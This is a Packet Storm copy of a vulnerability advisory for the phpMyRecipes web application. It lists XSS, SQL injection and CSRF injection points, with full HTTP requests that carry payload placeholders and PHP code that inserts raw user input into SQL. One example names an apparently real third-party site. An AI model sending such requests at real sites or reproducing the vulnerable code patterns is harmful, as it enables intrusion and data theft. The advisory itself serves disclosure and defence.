exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

phpMyRecipes 1.x.x XSS / CSRF / SQL Injection

phpMyRecipes 1.x.x XSS / CSRF / SQL Injection
Posted Dec 20, 2013
Authored by Rafay Baloch, Sikandar Ali

phpMyRecipes version 1.x.x suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
SHA-256 | 717dd33446428aed6b6a79a2fadd94fc507d0138e82b80c3ab389ab431f81f92

phpMyRecipes 1.x.x XSS / CSRF / SQL Injection

Change Mirror Download
*#Product: phpMyRecipes version 1.x.x
*#Vulnerability: Multiple SQL Injection, XSS and CSRF Vulnerabilities*
*#Impact: High*
*#Authors: Rafay Baloch And Sikandar Ali*
*#Company: RHAinfoSEC *
*#Website: http://rhainfosec.com

Introduction
============

"PhpMyRecipes is a simple application for storing and retrieving recipes.
It uses a web-based interface, for ease of use

across any system, and a MySQL database backend for storing the recipes."

Description
===========

We performed both whitebox/Blackbox test for phpMyRecipies and managed to
find large number of high risk vulnerabilities.

The application is poorly coded from a security perspective as it doesn't
offer any kind of filtering mechanism for

separating normal input with malicious input.

Vulnerabilities
===============

Several High risk vulnerabilities such as SQL Injection, XSS etc were
discovered. We have provided the vulnerable code for

some of the vulnerabilities. Full details have been sent to the Vendor, so
that they may apply patches accordingly.


Multiple Cross Site Scripting Vulnerabilities
=============================================

Multiple XSS vulnerabilities were found, the user input was not sanitised
before it was returned to the user. It is

advised to filter all the special characters before displaying back the
input to the user.

Details And POC's
=================

1) http://target.com?r_id=[XSS]

2) http://target.com/ingredients/ingredients.php?from=[XSS]

3) http://target.com/login.php

REQUEST
=======

POST /login.php HTTP/1.1
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password=Uname&username=[XSS]


4) http://recipes.delattre.ca/domenusearch.php

REQUEST
=======

POST /domenusearch.php HTTP/1.1
Content-Length: 194
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: Target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

r_acategory[]=5[XSS]&r_arecipes[]=0&r_days=17&r_dcategory[]=5&r_drecipes[]=0&r_mcategory[]=5&r_mrecipes[]

=0&r_servings=1&r_step=2

All Post Parameters were found vulnerable to XSS.

5)http://target.com/register.php


REQUEST
=======

POST /register.php HTTP/1.1
Content-Length: 158
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

email=aa@gmail.com[XSS]&name=XSS&password1=XSS&password2=XSS&username=XSS


#Note: All parameters were found vulnerable to Cross Site Scripting.



Multiple SQL Injection Vulnerabilities
======================================

Multiple SQL Injection Vulnerabilities were addressed, The user input is
directly being inserted into the SQL queries

without any proper santisation or filtering.


1) http://target.com/dosearch.php

POST DATA
categories[]=1[Inject_HERE]&ingids[]

=20&ing_modifier=2&name_exact=riuciyda&words_all=1&words_any=1&words_exact=1&words_without=1
=================================================


2) http://target.com/ingredients/ingredients.php?from=[INJECT_HERE]


Vulnerable Code
===============

if (! empty($_POST['from'])) {
$db_start = $_POST['from'];
} elseif (! empty($_GET['from'])) {
$db_start = $_GET['from'];
} else {
$db_start = 0;
}


<TABLE BORDER=3 WIDTH=100%>
<TR>
<TH WIDTH=85%>Ingredient</TH>
<TH COLSPAN=2>Actions</TH>
</TR>
<?php

if ($result = mysql_query("SELECT id,name from ingredients ORDER BY
name LIMIT $db_start, " . INGREDIENTS_PER_PAGE)) {
while ($row = mysql_fetch_array($result)) {
?>


2) http://target.com/recipes/textrecipe.php?r_id=[INJECT_HERE]

Vulnerable Code
===============

Line 37 - 42


# Get the recipe ID to view
$r_id = $_GET['r_id'];

if (! ($result = mysql_query("SELECT name FROM recipes WHERE id=

$r_id"))) {
dberror("textrecipe.php", "Cannot select recipe");
}


3) http://target.com/

REQUEST
=======

POST /domenutext.php HTTP/1.1
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

0=1&1=1&2=1&3=1&4=1&5=1&6=1&7=1&8=1&r_acategory[]=17&r_arecipes[]=[INJECT_HERE]&r_days=17&r_dcategory[]=5&r_drecipes[]

=0&r_mcategory[]=5&r_mrecipes[]=0&r_servings=1&r_step=3


4) http://target.com/dosearch.php

REQUEST
=======

POST /dosearch.php HTTP/1.1
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

categories[]=[INJECT_HERE]&ingids[]

=20&ing_modifier=2&name_exact=aaaaaaa&words_all=1&words_any=1&words_exact=1&words_without=1


Multiple CSRF Vulnerabilities
=============================

All forms were missing CSRF tokens, including some of the important ones
which would had allowed an attacker to force the

victim's browser into submitting a request which in return would had been
used to manipulate important details such as

changing email address, username etc. In our analysis, we found no CSRF
tokens to identify a legitimate request sent by

the user VS an attacker who forced victim's browser to send requests.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close